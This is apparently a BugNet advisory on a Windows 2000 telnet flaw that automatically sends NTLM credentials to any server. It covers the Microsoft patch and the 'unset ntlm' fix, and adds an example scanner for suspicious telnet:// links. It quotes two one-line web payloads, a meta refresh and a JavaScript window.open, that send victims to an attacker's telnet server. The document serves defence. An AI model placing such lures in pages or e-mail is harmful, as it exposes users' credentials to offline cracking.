Telnet, the mainstay of remote management for decades, got a feature enhancement in Windows 2000 that might streamline the logon process, but could also expose user authentication credentials to a hacker. Microsoft has recently released a patch that eliminates a security vulnerability in the Windows 2000 telnet client. The bug could allow a malicious user to trick an unsuspecting victim into automatically starting a telnet session with the hacker's telnet server, thereby transmitting critical user authentication information to that server.
With the help of KeyLabs, BugNet was able to reproduce this bug, which affects all Windows 2000 users. The vulnerability occurs because of a new authentication feature added to Windows 2000's telnet.exe. The feature lets telnet automatically authenticate with NTLM-enabled telnet servers (i.e. Windows 2000 Telnet Servers). NTLM is the standard authentication protocol used by Windows products. It uses a challenge/response mechanism to confirm a user's identity without sending the password across the wire.
Telnet or not to telnet?
The problem is that NTLM authentication happens automatically and by default whenever telnet is launched. So if a malicious user could entice a victim into initiating a telnet session with a server under the malicious user's control, then the malicious user could capture the victim's authentication credentials. Capturing the credentials by itself does not put the victim's computer at risk, nor does it allow the hacker to gain access to the victim's computer. It does, however, give the hacker enough information to launch an off-line brute force attack aimed at ascertaining the plain-text password. Because this attack is carried out off-line, the user and the system administrator are none the wiser, and the malicious user could take as much time as needed to get the password.
This raises the question: how might a malicious user entice a victim into establishing a remote telnet session? The answer is quite simple. Because pretty much all versions of Internet Explorer and Outlook will launch telnet when they encounter "telnet://hostname" in a carefully constructed HTML reference, the malicious user would only have to place such a reference on a web page or in an e-mail message. The referenced command could be as simple as:
<meta http-equiv="refresh" content="0;URL=telnet://hostname">
Or, if you prefer JavaScript:
<script>window.open("telnet://target")</script>
Despite the insidiousness of this vulnerability, there are some simple solutions. First, you can install the Microsoft patch. The fix is small and makes for a quick download. Install the patch by running the downloaded executable. No other user intervention is required, except for the mandatory system restart. So when installing the patch on a server, wait until restarting the server will have the least impact on the users.
Windows 9x and Windows NT are not affected; Windows 2000 is the only version that has this problem. Once installed, the patch will warn the user whenever telnet tries to authenticate outside the "Trusted sites" or the "Local Intranet" zones. The warning reads like this: "You are about send your password information to a remote computer in the Internet zone. This might be unsafe. Do you want to send anyway(y/n):"
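The following is an added example, not code from the BugNet article or from Microsoft: a small defensive scanner a mail gateway or web proxy could run to find telnet:// references in HTML or e-mail content (the meta refresh, JavaScript window.open and plain href forms described above) and to flag any whose host falls outside a configured "trusted" list, mirroring the zone check the patch adds to telnet.exe. The trusted-suffix list, the single-label-means-intranet rule and the sample document are all constructed assumptions for the example, not the actual Internet Explorer zone logic.

```python
"""
Added example (not from the BugNet article): scan HTML or e-mail bodies for
telnet:// references and flag hosts outside an assumed trusted/intranet list,
the way the patched Windows 2000 telnet client prompts before sending NTLM
credentials to a host outside the Local Intranet and Trusted sites zones.
"""
import re
from urllib.parse import urlparse

# Matches telnet://host[:port] wherever it appears: href attributes, meta
# refresh content, or string literals inside <script>. The character class is
# limited to what a URL authority may contain, so it stops at quotes and '>'.
TELNET_URL_RE = re.compile(r"telnet://([A-Za-z0-9.\-_@\[\]:%]+)", re.IGNORECASE)

# Assumption (constructed for this example): these DNS suffixes stand in for
# the "Trusted sites" zone; a single-label name stands in for "Local Intranet".
TRUSTED_SUFFIXES = (".corp.example",)


def host_of(url):
    """Return the bare lowercase host from a telnet:// URL, dropping port and userinfo."""
    parsed = urlparse(url)
    return (parsed.hostname or "").lower()


def is_trusted(host):
    """Assumed zone rule: dotless names are intranet, listed suffixes are trusted."""
    if not host:
        return False
    if "." not in host:
        return True
    return host.endswith(TRUSTED_SUFFIXES)


def find_telnet_refs(content):
    """Return (url, host, trusted) for every telnet:// reference in the content."""
    refs = []
    for match in TELNET_URL_RE.finditer(content):
        url = "telnet://" + match.group(1)
        host = host_of(url)
        refs.append((url, host, is_trusted(host)))
    return refs


def untrusted_hosts(content):
    """Hosts the patched client would prompt about: outside the trusted/intranet rule."""
    return sorted({host for _, host, trusted in find_telnet_refs(content) if not trusted})


# Constructed sample page containing the reference forms described in the article.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0;URL=telnet://capture.example.net">
</head><body>
<a href="telnet://router1">console</a>
<script>window.open("telnet://capture.example.net:23")</script>
<a href="telnet://jump.corp.example">jump host</a>
</body></html>"""


if __name__ == "__main__":
    for url, host, trusted in find_telnet_refs(SAMPLE_HTML):
        print(f"{'trusted' if trusted else 'PROMPT '}  {url}")
    print("would prompt for:", untrusted_hosts(SAMPLE_HTML))
```

On the constructed sample, the two references to capture.example.net are reported as hosts the patched client would prompt about, while router1 (a dotless name) and jump.corp.example (a listed suffix) pass the assumed zone rule. In a real deployment the suffix list would come from the organisation's actual intranet and trusted-site configuration.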
The second method for protecting a Windows 2000 system running telnet.exe involves disabling NTLM authentication on the telnet client. A Microsoft security bulletin on this vulnerability explains how to disable NTLM authentication in the telnet client. Issuing the command "unset ntlm" from the telnet command line will prevent telnet from automatically authenticating via NTLM. To check the status of telnet authentication, enter the command "display" from the telnet command prompt. If "Not Auth (NTLM)" is displayed, then Microsoft's challenge/response authentication is turned off.
Telnet has been around for a while. With some companies, telnet is the primary tool for managing network devices like servers and routers. Based on our test, BugNet recommends that all Windows 2000 users consider installing this patch.
August 18th, 2009